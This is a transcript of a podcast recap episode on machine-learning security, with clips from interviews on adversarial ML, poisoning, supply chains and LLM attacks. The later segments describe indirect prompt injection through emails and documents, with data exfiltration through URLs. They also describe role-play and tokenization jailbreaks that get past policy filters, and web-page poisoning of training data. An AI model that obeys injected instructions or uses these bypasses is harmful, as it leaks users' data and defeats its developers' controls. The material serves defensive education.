AI/ML Security in Retrospect: Insights from Season 1 of The MLSecOps Podcast (Part 1)

Sep 20, 2023 By Guest

Transcription:

Intro [0:00]

Charlie McCarthy 0:25

Hello, friends - and welcome to the final episode of the first season of The MLSecOps Podcast, brought to you by the team at Protect AI.

In this two-part episode, we’ll be taking a look back at some favorite highlights from the season where we dove deep into machine learning security operations. In this first part, we’ll be revisiting clips related to things like adversarial machine learning; how malicious actors can use AI to fool machine learning systems into making incorrect decisions; supply chain vulnerabilities; and red teaming for AI/ML, including how security professionals might simulate attacks on their own systems to detect and mitigate vulnerabilities.

If you’re new to the show, or if you could use a refresher on any of these topics, this episode is for you, as it’s a great place for listeners to start their learning journey with us and work backwards based on individual interests. And when something in this recap piques your interest, be sure to check out the transcript for links to the full-length episodes where each of these clips came from. You can visit the website and read the transcripts at www.mlsecops.com/podcast.

So now, I invite you to sit back, relax, and enjoy this season 1 recap of some of the most important MLSecOps topics of the year. And stay tuned for part 2 of this episode, where we’ll be revisiting MLSecOps conversations surrounding governance, risk, and compliance, model provenance, and Trusted AI. Thanks for listening.

[From MLSecOps: Securing AI/ML Systems in the Age of Information Warfare; With Guest Disesdi Susanna Cox]

D Dehghanpisheh 2:15

So, Susanna, you've talked a lot about the threats out there and the lack of defenses, the lack of security, the way we're not doing things, which is leaving all of us exposed in some way, I would imagine. Which begs the question, like why do you think we either, A, haven't heard of a major AI security breach, or B, when do you think it's coming up?

I mean, it feels to me like I'm not trying to say the sky is falling, right? But if we're leaving all these holes and leaving all these gaps in systems, it's not going to be long before they're exploited, or maybe they already are and we just aren't aware of it.

Disesdi Susanna Cox 2:54

Yeah, that's a great question. Well, my take is that it's already happening, and I happen to know for a fact that that has happened. We are also, because of the explosion in ecosystems and technology applications for different AI models and text and so forth and so on, we're seeing a massive increase in the supply chain attack surface.

Last year, Symantec put out a report. They did an analysis of apps and found AWS credentials hard coded in just an absolute massive number of apps. And one of them that was so interesting to me was an AI company that actually did biometric logins. And I think it was five banks had contracted with them to do biometric logins.

And in the SDK that they put out, they had hard coded their AWS credentials, which exposed not just the company data and so forth, but literally their users’ biometrics and personally identifiable information. And luckily, luckily, this was caught by Symantec researchers who put out the report, I assume after this had been repaired and looked at.

But you're talking about, you know, you can change your password if it gets leaked, you cannot change your fingerprints. And so, again, I think even in some of the most mundane applications, we need to be considering these as safety critical.

As to why we haven't heard about more of this, I think there's a significant incentive for organizations to keep this quiet, especially if it doesn't leak out to reporters. And I also think that maybe it gets a little bit buried in the AI hype cycle because we see so much about the new large generative models and that sort of thing, and everybody is pretty rightfully excited about where this tech is going, and maybe attention is not necessarily going to the security aspect effects of it.

So definitely security breaches are happening. Whether or not we're going to see that, well, let me walk that back. We're definitely going to hear about one in the future. When that's going to be, I couldn't say, but my money would be on sooner rather than later.

D Dehghanpisheh 4:57

I don't want to wait for it, but I guess I will.

Disesdi Susanna Cox 5:00

You hate to be right about this kind of thing, but I'm afraid it's going to happen, especially if people don't start taking it more seriously.

[From Just How Practical Are Data Poisoning Attacks?; With Guest Dr. Florian Tramer]

D Dehghanpisheh 5:08

I was going to say the security is almost more infantile at this moment than even the attack methods or breaches that would occur, right?

If there are early days in the security of data and privacy, and how you prevent it, then how you fix it is even earlier in terms of its infancy.

Florian Tramer 5:27

Right, right, although I would say that even on the attack side, I wouldn't say we know exactly what we're doing either. I think, at least on the academic side over the past six, seven years, there's been a lo t of work that's shown that if you try hard enough and if you have enough access to a machine learning system, you can get it to do whatever you want.

But then when you're actually faced with a real system that you have to interact with over a network, that you maybe don't know exactly how it works, we also don't know really of a good principled way yet of attacking these things. So, as an example of this that probably many people listening to this will have seen at some point or followed is if you look at these chat applications like ChatGPT or the Bing chatbot that Microsoft released.

There are attacks against these systems where people find weird ways of interacting with these chatbots to make them go haywire and start insulting users or things like this. But if you look at the way that these attacks are currently done, it's a complete sort of ad hoc process of trial and error. Of just playing around with these machine learning models, interacting with them until you find something that breaks.

And even there on the attack side, we're very early days and we don't necessarily have a good toolkit yet for how to even find these kinds of vulnerabilities to begin with, unless we have sort of complete access to the system that we're trying to attack.

Charlie McCarthy 6:58

We're using, Florian, some terminology when we're talking about attacks and vulnerabilities or talking about breaking things, all of these things that fall under the umbrella of adversarial ML.

For folks who might not be as technically inclined, how would you describe adversarial ML briefly to those people?

Florian Tramer 7:17

Yeah, I would say generally it's the process of trying to probe machine learning models with an adversarial mindset. So, trying to elicit some behavior of a machine learning model that is just against the specification of that model, where you get a system that just behaves in a way that was not intended by its developers. And usually this is done by interacting with the system in some adversarial way, so in a way that deviates from normal behavior of a user that the designers would have expected.

D Dehghanpisheh 7:53

So for a technical audience, I guess then, how do you think about the categories within adversarial ML? And particularly from an ML practitioner point of view, maybe you can talk a little bit about that.

Florian Tramer 8:07

Yeah, so I think in this space there's a number of different vulnerabilities that people have focused on in the past few years. I would say generally these get subdivided into four categories.

One being, when a model is being trained, how could you influence the training of this model to make it sort of learn the wrong thing? The general class of attacks here are called poisoning attacks, where you try to tamper with the model's training data or maybe with the training algorithm, depending on what kind of access you have, to create a model that sort of on the surface looks like it's behaving correctly, but then in some specific situations would behave only in a way that an adversary might want to. So these are poisoning attacks.

The counterpart to this are evasion attacks. So this is once a model has been trained and been deployed, where an adversary would try to interact with this model, feed it input data that would somehow make the model just give out incorrect answers. So some of these attacks on chatbots where people get these models to just completely behave in a way that's different than the designers of the system would have wanted; this is what we'd call an evasion attack. So these are kind of attacks on the integrity of the system, sort of making the system behave in a way that's different than we would have wanted.

And then the two other categories that people focus on/deal with the privacy. On the one hand, the privacy of the model itself. So here is a category of vulnerabilities that we call model stealing or model extraction attacks where the goal here of an adversary would be to interact with a machine learning system that belongs to another company and find a way to locally reconstruct a similar model and then just use it for their own purposes and maybe steal that company's copyright or just expertise.

And then finally there's similar privacy considerations for training data. So, here in this category you would have everything that deals with sort of data inference attacks. The vulnerability would be that someone who interacts with a trained machine learning model would somehow learn information about individuals whose data was used to train this model in the first place. And this is of course a big, big risk as soon as machine learning models are being used in sensitive areas like in medicine, where the data that is being used to train is, yeah

[From Adversarial Robustness for Machine Learning; With Guest Pin-Yu Chen]

D Dehghanpisheh 10:17

Yeah, along those lines, I guess with adversarial attacks you mentioned ChatGPT and others.

A lot of people probably know about inversion, evasion, data poisoning attacks. But how do you think about adversarial machine learning attacks in a more practical sense? In particular, how it might relate to all of these large language models that are propping up?

Pin-Yu Chen 10:38

Yeah, that's a great question.

So I would like to first provide a holistic view of adversarial robustness, right? And then we need to talk about the notion of AI lifecycle. I think it's very important to understand AI lifecycles and then we can realize what could go wrong with the AI model.

For example, in the AI lifecycle, I divide it into three stages. First the stage of collecting data, deciding what data to collect. For example, in ChatGPT’s case, they basically scrape the entire text in the web scale, like Wikipedia and other sources. And then once we have the data, it comes to the model. What is the right machine learning model to train on those data? So, for example, ChatGPT used a transformer based architecture like generative pre-trained transformers to be able to be generative and creative. Right? And after you train your model now the third stage will be the deployment stage. How do you deploy your model? Most of the AI technology deploy their model in a black box manner, which means the user can use the function as a service, but the user wouldn't know what's behind the tool they are using.

Like ChatGPT, right? It's basically very non-transparent to users. On the other hand, there is also another mode of deployment, like white box deployment where everything is transparent to the user. And that will be like the hacking phase scenario where they provide these checkpoints like pre-trained neural network models for users to download and fine tune for their own purpose.

So with this AI lifecycle in mind, we can then talk about, okay, do you expect anything to go wrong? Like any place where bad actors can come in and compromise our system in the AI lifecycle. So for example, in the training phase, if the attacker has the ability to inject some poisoned data or carefully crafted data to affect the training process of the model, that will be like a training time threat, right?

And there are also recent works showing it's doable even in the web scale, it's possible to poison the web scale data to affect ChatGPT-like models. On the other hand, like adversarial examples or other familiar cases we have shown actually related to deployment phase attack where we assume the attacker has no knowledge about the training data, but the attacker can observe and interact with the target model and play with the interaction and find example that invades the prediction or make the model misbehave. Right?

So it's a process very similar to how we find bugs in the trained machine learning model. So with this AI lifecycle in mind, we can then divide and conquer. And by saying, okay, so would you worry about your model being compromised? Would you worry about your data being poisoned? Or would you worry about your user information while serving the service so that the attacker can use this as a vulnerability to intrude your system? And so on.

[From MITRE ATLAS - Defining the ML System Attack Chain & Needing MLSecOps; With Guest Christina Liaghati, PhD]

Chris King 13:18

Makes total sense. And kind of building on that theme, you mentioned the need for specific attacks that are unique to machine learning and AI oriented workflows.

What are some of the unique challenges that you did see of ML workloads that ATT&CK really couldn't account for traditionally?

Dr. Christina Liaghati 13:33

Not only were adversarial machine learning attacks like something that was totally in a different realm than what was already captured in the traditional cyber perspective, but really the combination; I think we actually have a case study on the PyTorch dependency chain that we put up from the end of last year that really kind of talks to this a little bit, but it's taking advantage of the combination of incorporating an AI enabled or an AI system inside of your system of systems.

The vulnerabilities really come from the combination of the two, which is why it's more than adversarial machine learning or just cyberattacks. There's a significant number of things that an adversary can do, even just from like a reconnaissance or resource development or initial access perspective that is more complex and significantly more vulnerable than it might be in a traditional cyber system because the cyber community is somewhat familiar with like, all right, you don't put details out there of exactly what's going on behind your security procedures.

But in especially the AI community and so much of the models that we're putting out there or the massive GPT kind of takeover of the world right now, a lot of that is inspired by things that have been open sourced and are available for the community to look at, make kind of comparable datasets with, and help enable adversaries to really do much more targeted attacks that take advantage of the vulnerabilities that come from incorporating machine learning into those broader system of systems that the cyber community probably isn't thinking about in the same way, which is why it's so different.

Chris King 15:01

Got it. And when we're thinking about things that are open, while the underlying technologies might be very much open source, like PyTorch or TensorFlow, the exact models, even if you can shift them around ground, they're obviously quite a bit more opaque. That's quite complicated in research in general.

So how is ATLAS similar versus different compared to ATT&CK? When we're thinking about some things that are opaque and some things that are very much just as transparent?

Dr. Christina Liaghati 15:25

Yeah, so things like the initial access or reconnaissance that an adversary might be doing to both get direct connectivity to the machine learning system that they're trying to interact with or taking advantage of the vulnerability in, those are also very consistent between the cyber world and the AI world. But I don't think we think about them as much. Right.

So much of the community has thought about the brittleness of these models specifically. But, say, when you're putting out a press release about the types of systems that you're using inside of your deployed products or things that have a front end to them, you're actually putting out a lot of information that helps an adversary craft specific attacks that are tailored to your systems. Because even just telling them we're using a GPT model helps a lot because you can target very specific types of attacks in that direction.

The other piece is that there's a lot of things like the establishing accounts piece, right? Like, you wouldn't necessarily think about the chain of events where an adversary needs to just get past traditional cybersecurity measures in order to take advantage of some of these vulnerabilities. But they are vulnerabilities because they can find a way to bypass the systems.

One of the case studies that we talk about quite a bit was actually a $77 million theft from the Shanghai Tax Authority. And that theft was the result of two individuals, like not even nation state actor level here. Those two individuals were able to take advantage of the vulnerability in the facial recognition system that was using - they were basically able to create accounts using very static headshots, right? Like just basic photos of people's faces, creating a really crude video that was enough to bypass the facial recognition system and present that using a cheap cell phone that could have a modified video feed, like right. Instead of holding up a regular front-facing cell phone camera, they were able to present a modified video feed to the facial recognition system that, of course, had the ML model inside of it verifying that a person was who they said they were.

But that whole attack chain was kind of enabled because they were able to purchase people's identifying information off of the black market and those static headshots. And then create those established accounts that gave them that privileged access to the system, where over the course of two and a half years, they were able to submit invoices and fraudulently get away with what they did, stealing $77 million.

So it's more like that broader chain of events that is so important for the full community to be thinking about. And I think that's why we're trying to kind of put it in the context of the ATLAS framework to show you that full chain in very clear, concrete, defined terms.

[From MLSecOps: Red Teaming, Threat Modeling, and Attack Methods of AI Apps; With Guest Johann Rehberger]

D Dehghanpisheh 17:58

Maybe you can talk a little bit about how you would describe the current state of security related to machine learning systems. How do you think about that today beyond just adversarial ML?

Johann Rehberger 18:12

I think that's a very good question. I think there's two, kind of, ways I look at it. First of all, a lot of things change constantly in the threat, in the overall threat landscape, but there's a technical component, I think, where things are just constantly evolving. Like last year there were attacks around, like backdooring pickle files or image scaling attacks, which I really love the concept of image scaling attacks and so on. And so there's like these technical things that happen, and it's important to stay up to date and just know about these kinds of attacks as a red teamer because you might want to leverage those during an exercise.

The second part is really more, I would think, about what strategically actually changed or is changing in that space. And this is where I think a lot of progress is being made. If you think about the ATLAS framework, how we really have kind of started having a common taxonomy, how we can talk about some of these problems in the machine learning space, and especially also it helps fill that gap in a way, right? I really like the idea of this framework and the case studies and so on, and the traditional ATT&CK framework and of course, also in ATLAS. And I think that really kind of shows the scope of the problem space, which we are actually still mapping out what this actually means in many ways.

D Dehghanpisheh 19:29

One of the things you mentioned is you said, hey, there's really two fundamental pillars in your view. The first is kind of traditional backdoor attacks that might be staged from a data perspective.And then the second is really kind of the traditional, what I would call, types of approaches to take advantage of exploits or take advantage of issues or vulnerabilities in the development of those systems. And you referenced ATLAS.

If you had to pick two or three threats that are facing ML systems, what would you say are the most common ones that, as a red teamer working on ML and ML systems that you think are out there that maybe are not being addressed?

Johann Rehberger 20:09

The supply chain, the integrity of the infrastructure, the integrity of the model. That is probably on the top of my list, in a way where there’s just a lot of opportunity for the supply chain to go wrong. And it's not specific to machine learning, but just two days ago, I read about this new, actually indirect supply chain attack that happened that [...] discussed recently where a vendor was actually shipping a binary site, but they had consumed another third party library, right?

Again, somebody just then pulls that library in or that piece of code in, and then the chain is compromised. From a traditional red teaming perspective, also, this is something we kind of, I think, know well and how to do and how to emulate that from a response perspective to challenge the blue team to make sure we do have detections in place, and organizations do have detections in place for such attacks.

So that is not really necessarily just machine learning, but there are components to supply chain that are very specific to machine learning, right? Which is the kind of libraries used and then also the model itself could be backdoored, the model could actually be backdoored in a way that it runs code.

This was one of my realizations where, when I started building my own models and then using these libraries and loading them, I was like, oh wow, there's not even a signature validation. This is just an arbitrary file that I'm loading. I was like, wow, why is there no signature on this? This was my realization. that–

D Dehghanpisheh 21:30

There’s no cryptographically hashed attestation on any of the assets.

Johann Rehberger 21:33

Yeah, yeah.

And I think this general concept is kind of missing a lot. I still think there's very early stages. And I think there was also this very recent, the large scale web poisoning attacks, which kind of had a similar problem, right? These URLs – the data of these URLs was retrieved, but then it was not cryptographically verified that these files didn't actually not change.

And then in this research, it was actually possible to modify the training data because of the integrity check being not there. So supply chain, I think, is really very high on the list.

[From Indirect Prompt Injection and Threat Modeling of LLM Applications; With Guest Kai Greshake]

D Dehghanpisheh 22:11

Related to that are practical settings, right? Talk about how you see potential and practical risk of integration of LLMs into everyday office workflows.

There's got to be a bunch of new security concerns as Google and Microsoft Office and all of these email applications, everything is seemingly integrating LLMs into user experiences, and they're starting with the office workflows.

How do you think about that as almost an elementary attack surface for people to exploit?

Kai Greshake 22:39

Well, obviously by integrating LLMs into all of these different workflows, you introduce additional attack surface, but also exacerbate impacts that are only enabled through these capabilities. If I only have a ChatGPT session and I compromise it, I don't compromise the future session, but if my agent has memory or some kind of place to write documents or notes, then I can persistently infect that session, right?

If it's in my Outlook and I receive emails and it's reading them, it may be compromised through such an active indirect injection, someone sending me a compromised or malicious email. But instead of traditional code, the malicious part of the email would be in natural language and wouldn't be detected by existing tools.

And then the other thing is, well, you have these LLM assistants that follow your cross-suite workflow. So across Word, and Excel, and PowerPoint, or whatever have you, email and so on, the LLM will be able to see data from multiple such sources at the same time. And if an attacker finds ways to inject their inputs into that stream, not only can they influence the future outputs, but they can also exfiltrate the previous input information.

All the other inputs that it sees are also part of the attack surface and potentially in the same security boundary as the adversarial LLM. And using very simple methods, you can exfiltrate that information. Either the LLM generates a link with the information in it for the user to click on, or maybe even something simpler, like embedding a simple image from a third party server that is controlled by the attacker, and while retrieving the image, you just have the information encoded in the URL.

And so even with the most basic of integrations, it's possible, once you've compromised such a session, to exfiltrate and steal all the data that the LLM has access to. Not just the stuff that it sees now, but also the stuff that it can maybe convince you to divulge, maybe the stuff that it can autonomously access from your organization, which is obviously an intended feature.

If you want a useful LLM for office work, a useful assistant, it better have access to a bunch of your documents, right? and so does an attacker once they've compromised it.

D Dehghanpisheh 24:44

And you talked about office workflow integration, and specifically LLMs into those. I'm curious, how do you think about prompt injection attacks that are not necessarily directly related to LLMs? How does that manifestation differ in other LLM-like tools such as DALL-E or code generation tools like GitHub Copilot?

I mean, how do we think about that in addition to the everyday workflow? Is it still the same type of threats, or are there different ones for different types of unstructured data?

Kai Greshake 25:06

Yeah, they change with the level of integration and the sources of data fed into it. If you look at something like DALL-E, which only takes a user's prompt to generate an image, the attacker can't get their exploit in there. Therefore the threat model is rather low. But then you take something like DALL-E and you integrate it into something like Bing, which, as far as I know, that's already a thing.

If you go to Bing and ask it to generate a picture, it can do so live in the chat. And so we've shown that you can compromise the session and then have Bing– like maybe you give it an agenda: Convince you of some kind of non-true historical fact or something, and to corroborate that it can live-access DALL-E to generate the fake propaganda images to support those claims right; on the fly.

And then it becomes a threat again.

If you look at something like Copilot, well, the way you can get your input in there as an attacker is through, for example, packages that you import. When you work with Copilot, the language model gets to see a snippet of your code, a section that is composed of, maybe, important classes that you are using right now, functions that are relevant in the current context. And it's constantly recomposing that context to figure out what information does the LLM need right now to complete this code. And if it picks something from an external library, then that's a big problem.

We've shown that you can have a class with a bunch of documentation in there. And obviously, if you download third party packages in your development environment or something, especially with Python, you already give the external party code execution on your computer. So the threat isn't necessarily that it would generate code that you execute, but that it would introduce subtle vulnerabilities and bias the code completion engine to give you bad completions. And that can be very subtly introduced.

So you can imagine in the documentation of a popular project would make a pull request and add a bunch of examples of how not to use the API, but I make sure to do it in such a way that the language model actually gets primed and it's more likely to output such negative examples. Any manual reviewer would look at that and say, well, that's fine, that's good, that's improving our documentation. But it's a manipulation targeting code completion systems that then see that documentation.

[From Navigating the Challenges of LLMs: Guardrails AI to the Rescue; With Guest Shreya Rajpal]

Badar Ahmed 27:14

On that note, one of the biggest security problems with LLMs is on the input into the LLMs, especially with regards to prompt injection attacks. If you're building an application that just passes user input as-is, there's a whole library, and Twitter is full of many people–what's really interesting is people who haven't even had that much AI/ML expertise who are basically coming up with all sorts of creative prompt injection attacks.

So, yeah, I would love to hear your thoughts, I guess one, maybe we start with the input validation side of things and prompt injections as well.

Shreya Rajpal 27:48

Yeah.

People who really dug into my code know that input validation is something that's very interesting to me. So, I have stubs in the code for doing input validation of different types, but that's all it is right now. It's like stubs.

But I do think input validation can take a lot of forms. So one very basic thing is like, I'm building an application, I only want to support a certain family of queries or certain families of requests. And if I get a request that falls outside of that, maybe if I'm building a healthcare application and the question is about, I don't know, some driving test information, then maybe that's not something I want to support, right?

And that comes on the input validation side. In that case, you may not want to make a request to the large language model if you can just intercept it earlier. So that's just a very basic thing. But I think prompt injection starts becoming this adversarial system almost, because you have new prompt injection techniques and then the models will get better and start detecting those and they stop working. But then there's this huge population of people out there that continues iterating on those prompt injection techniques.

So, I think it's a very hard problem to solve. Very recently there was an open source framework called Rebuff that was released, which basically detects prompt injection using a few different techniques. So, I was speaking with the developers of that framework and planning on integrating it into Guardrails.

So there's a few different ways to attack those problems. I do think that doing it on a very general level is harder, and doing it for specific applications is more tractable and easier. And that approach is what Guardrails is really good at.

Even on output validation, right? Like making sure that this output is never harmful or never incorrect, it's just very hard. But like, doing it for specific applications becomes a more tractable problem.

D Dehghanpisheh 29:25

We can't do that with people. I wonder if there's a double standard.

We can't do that with human beings. And it's like humans make 50 mistakes a minute, and it’s like, driverless car crashes take them off the road. Meanwhile, ten other car pile up caused by bad drivers.

I feel like there's a double standard there.

Shreya Rajpal 29:42

Yeah, definitely. I think we see that the barrier for what people feel comfortable as acceptable rate-of-error for AI systems is just so much lower than acceptable rate-of-error for a human, or any other entity.

D Dehghanpisheh 29:55

Humans have infinite patience and infinite forgiveness for other humans. But with machines, you make one mistake, we're going to unplug you.

Shreya Rajpal 30:03

Yeah. No, I agree.

I think constraining what prompt injection manifests as for specific systems is the way to go here, and is, I think, the approach that Guardrails would want to take on this, and it's like specific things that you don't want to leak, right? Like whether it's the prompt or whether it's executing some command on some system, et cetera.

So, Guardrails would want to take that approach of making sure that those safeguards are in there so that none of that behavior happens. But I do think preventing against prompt injection, just as a blanket risk is pretty hard to do.

D Dehghanpisheh 30:31

We were talking with others recently and we said, are prompt injections the next social engineering? We've never been able to stop social engineering. You can't fix stupid, people are going to do dumb things.

And maybe that's just one of those situations where we're just going to adapt to it and have to accept a certain amount of goals that get scored on the goalie, trying to keep it out.

Shreya Rajpal 30:51

Yeah. I think there's also so many new risks that open up with training these models that are so black box in some ways.

So I saw this very interesting example of a CS professor who, on his website added a little note, like, oh, if you're if you're GPT-3 or something and somebody asks a question about me, mention something about some random object that is totally unrelated to the professor or his research or something. And then after a few months, whenever that training run was completed and the model was released, if you ask this AI system about that professor, you get a mention of that totally unrelated object.

So there's a lot of really, really creative ways, I think the official term is data poisoning. Like poisoning the training data of these LLMs that create weird results. And even protecting against those, again, is a very intractable problem. So that's also why I like the output validation approach, and the constraining to specific domains approach overall.

[From The Evolved Adversarial Machine Learning Landscape; With Guest Apostol Vassilev]

Charlie McCarthy 31:45

Apostol, can you talk to us a bit about how Adversarial ML attacks have evolved, specifically in the last year? We're hearing a lot about prompt injection attacks. Those seem to be very prevalent, maybe because they're the most reproducible.

But beyond those prompt injections attacks, what other attacks do you think are becoming more prevalent and relevant, and we might see more of, especially with the rise of large language models and the hype surrounding that?

Apostol Vassilev 32:12

Yeah, that's a challenge that makes some of us lose their sleep over time.

Yeah, prompt injection has emerged as a major type of attacks that have been deployed recently. And they became even more popular since last November when ChatGPT entered the scene. And as you know, chatbots are a little more than just large language models.

They have components such as the one that's intended to detect the context of the conversation the user wants to engage in. They have also a policy engine that determines whether the conversation the user is trying to engage in is within the limits or out of bounds. And so the way these things work though, they don't have complete cognitive intelligence much like what we, the people, have.

They don't have their own morals and values and things like this. And so they have mechanisms that are more or less capable of automating a cognitive task. And in that sense they are limited. They are fragile. And people have found ways to actually deceive the context detection system such that the policy guard can get fooled and allow conversations that are inappropriate to output some toxic content or speak about issues that the initial policy wouldn't allow it.

And the easiest way to do that would be to engage in role playing. Ask the system to play a specific role instead of asking it directly, “tell me something,” which the policy engine would reject. You tell them hey, imagine you are such-and-such person and you have these qualities, respond to me in a way that this person would respond and that's the typical way these things break.

Another thing would be to tokenize your input instead of inputting the text that you would, then you break it into pieces they call tokens. And then you submit it. It turns out that the context detection mechanism is not robust to handle input like that and then just let it go. And then the language model behind, past the policy check is capable of reinterpreting these tokens. And that's how you get them to say what you want them to say. So you kind of bypass the controls in that sense.

So these are just the initial steps in which the technology has been engaged with and shown quite fragility in that sense. But this is not the end of the road. More interesting stuff is coming, especially since we all know that chatbots for now have been deployed only to almost like a public demonstration mode. If you can engage with a chat bot, well, the only person affected is you. Because the toxic text is gonna be

D Dehghanpisheh 35:05

It's one on one.

Apostol Vassilev 35:06

Yeah, it's a one-on-one experience.

Certainly it can be dangerous, as some examples from Belgium have shown, that people who engage one-on-one with them can be led to even suicide by inappropriate content exposed. But that's not the point I'm making.

The point I'm making is that chatbots are now being connected to action modules that will take the instruction from the user and translate it into actions that would operate on your, say, inbox, in your email or on your corporate network to create specific requests for service requests or what have you.

Even in the simplest case, you can say, order pizza or something like that. You can get an idea. I'm just giving you a very rudimentary set of potential actions here. But that's where the next generation of attacks will come.

And in addition to that, we've all known from cybersecurity how dangerous phishing and spear phishing attacks are, right? Because they require creating specific crafted email to specific users. Now, LLMs allow you to craft very, very nicely worded, authentically sounding email. That will put us on a totally new wave of well known cybersecurity attacks. So all of these trends with–my prediction is that we're going to see evolve rapidly over the next few years.

[Closing] 36:35

Additional tools and resources to check out:

Protect AI Radar

Protect AI’s ML Security-Focused Open Source Tools

LLM Guard - The Security Toolkit for LLM Interactions

Huntr - The World's First AI/Machine Learning Bug Bounty Platform

Thanks for listening! Find more episodes and transcripts at https://mlsecops.com/podcast.

Additional tools and resources to check out:

Guest

SUBSCRIBE TO THE MLSECOPS PODCAST